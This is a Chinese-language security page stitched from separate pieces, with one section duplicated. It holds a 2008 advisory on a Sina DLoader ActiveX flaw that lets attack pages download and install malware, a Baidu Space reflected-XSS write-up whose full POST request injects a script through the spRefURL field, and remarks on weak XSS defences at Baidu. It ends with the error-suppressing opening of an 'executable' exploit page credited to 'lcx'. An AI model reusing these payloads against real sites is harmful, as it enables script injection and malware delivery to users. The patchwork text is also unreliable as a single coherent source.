新浪DLoader Class ActiveX控件任意文件下载漏洞
来源:知道安全
发布日期:2008-7-18
最后更新日期:2008-7-18 15:57(GMT)
受影响系统:
Sina UC
新浪网络电视
详细:
知道安全于近期捕获该漏洞的利用代码,在7月份网络上已经出现利用此漏洞的攻击代码.可导致用户在访问到黑客构造的攻击网页后,可能将恶意文件下载到系统安装,并且随着系统启动而执行.
来源:知道安全
发布日期:2008-7-18
最后更新日期:2008-7-18 15:57(GMT)
受影响系统:
Sina UC
新浪网络电视
详细:
知道安全于近期捕获该漏洞的利用代码,在7月份网络上已经出现利用此漏洞的攻击代码.可导致用户在访问到黑客构造的攻击网页后,可能将恶意文件下载到系统安装,并且随着系统启动而执行.
来源: 大风起兮云飞扬
注:版权所有,转载请注明出处。
先把漏洞讲完,再开始扯淡。
今天的第一个漏洞还是出在spRefURL上
XSS 13: 百度空间创建文章错误返回XSS漏洞
在写博客的地方,如果提交时篡改spRefURL为恶意脚本,此时若提交失败,则返回页面中会包含我们的恶意脚本。
在创建文章时提交参数如下:
ct=1&cm=2&spBlogID=1f9a3aacaff38d0c4b36d6f5&spBlogCatName_o=%C4%AC%C8%CF%B7%D6%C0%E0&edithid=
&spRefURL=http%3A%2F%2Fhi.baidu.com%2Ftestuser%2Fmodify%2Fblog%2F1f9a3aacaff38d0c4b36d6f5')"><script>alert(/XSS/);</script><"('
&spBlogTitle=xxxxxxxxxx&spBlogText=xxxxxxxxxxxxxxxxxxxxxxxxxxxxxx&spBlogCatName=%C4%AC%C8%CF%B7%D6%C0%E0nonexist
&spIsCmtAllow=1&spBlogPower=0&spVcode=&spVerifyKey=&tj=+%B1%A3%B4%E6%D0%DE%B8%C4+
来源: 大风起兮云飞扬
注:版权所有,转载请注明出处。
今天内容比较平淡,都是普通的XSS。
竞价排名是百度的一个子系统,应该是比较赚钱的一个系统。
访问地址是: http://www2.baidu.com
但是这个系统和其他核心模块比起来,安全性要差上很多。
糟糕的验证码设计暂且不说,XSS方面几乎没有防范。
今天讲这个子系统主要是举例下baidu在非核心系统方面对安全考虑和重视程度的欠缺。
类似存在缺陷的系统还非常多。就不一个个去挖了,没有挑战性也没什么意思。
作者:lcx
可执行版,请勿用于非法用途。
<script type="text/javascript">
function killErrors() {
return true;
}
window.onerror = killErrors;